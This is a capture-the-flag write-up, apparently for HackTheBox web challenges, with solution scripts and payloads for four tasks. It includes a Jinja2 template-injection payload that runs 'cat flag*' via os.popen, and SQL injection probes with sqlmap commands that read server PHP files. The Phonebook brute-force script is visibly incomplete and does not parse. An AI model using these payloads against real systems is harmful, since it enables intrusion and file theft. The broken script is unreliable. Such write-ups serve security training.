2021-4-19

2021-4-24

# Challenges

## Web

### Emdee five for life

easy 题

import requests
import re
import hashlib

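# Challenge instance address (per-instance host:port as given in the writeup).
url = "http://46.101.53.249:32444/"

# Seconds to wait on each HTTP call; without it a stalled connection would
# block the retry loop indefinitely.
TIMEOUT = 10

# Retry until the server accepts the hash within its time window.  Each attempt
# uses a fresh session so the challenge string fetched and the hash posted belong
# to the same server-side session (inferred from the original's per-iteration
# `requests.session()` — confirm against the challenge).
while True:
    with requests.Session() as session:
        resp = session.get(url, timeout=TIMEOUT)
        found = re.findall(r"<h3 align='center'>(.*?)</h3>", resp.text)
        if not found:
            # The page did not contain the expected <h3>; fail loudly rather
            # than with a bare IndexError on an empty list.
            raise RuntimeError("challenge string not found in response page")
        code = found[0]
        print(code)

        # The challenge asks for the MD5 hex digest of the displayed string.
        str_md5 = hashlib.md5(code.encode("utf-8")).hexdigest()
        print(str_md5)

        resp1 = session.post(url=url, data={"hash": str_md5}, timeout=TIMEOUT)
        print(resp1.text)
        if "Too slow!" in resp1.text:
            continue
        # Accepted: stop here instead of re-requesting forever as the original
        # loop did (it never left the loop on success).
        break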



### Templated

easy 题

{{ "".__class__.__mro__[1].__subclasses__()[186].__init__.__globals__["__builtins__"]["__import__"]("os").popen("cat flag*").read() }}


### Phonebook

Easy题

import requests
# NOTE(review): this listing appears to have lost content in extraction — both
# `data = {...}` literals are empty, `url` is never assigned, and the trailing
# `else:` has no body, so the script does not parse as shown.
data = {
}
# Candidate characters, tried one at a time on each pass of the loop below.
# NOTE(review): "\$" is an unrecognized escape in a Python str literal (it
# yields a backslash followed by a dollar sign); it is probably a markdown
# escaping artifact of a plain "$" — confirm against the original script.
input_data = ["a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z","A","B","C","D","E","F","G","H","I","J","K","L","M","N","O","P","Q","R","S","T","U","V","W","X","Y","Z","#","\$","%","@","!","0","1","2","3","4","5","6","7","8","9","{","}","[","]","_","&","^"," "]
while(1):
for i in input_data:

# The loop variable `i` is not used anywhere in the visible code; presumably it
# populated the (lost) request payload below — verify against the original.
data = {
}

# Posts the current payload and treats the string "/search" in the response
# body as a hit, printing the payload and leaving the inner loop.
resp = requests.post(url=url,data=data)
if("/search" in resp.text):
print(data)
break
else:


### FreeLancer

/portfolio.php?id=2 and 1=1--+ 回显正常
/portfolio.php?id=2 and 1=2--+ 回显失败


dump下数据库

sqlmap -u "http://206.189.121.131:31196/portfolio.php?id=1" --file-read=/var/www/html/index.php


sqlmap -u "http://206.189.121.131:31196/portfolio.php?id=1" --file-read=/var/www/html/portfolio.php


sqlmap -u "http://206.189.121.131:31196/portfolio.php?id=1" --file-read=/var/www/html/administrat/index.php


sqlmap -u "http://206.189.121.131:31196/portfolio.php?id=1" --file-read=/var/www/html/administrat/panel.php


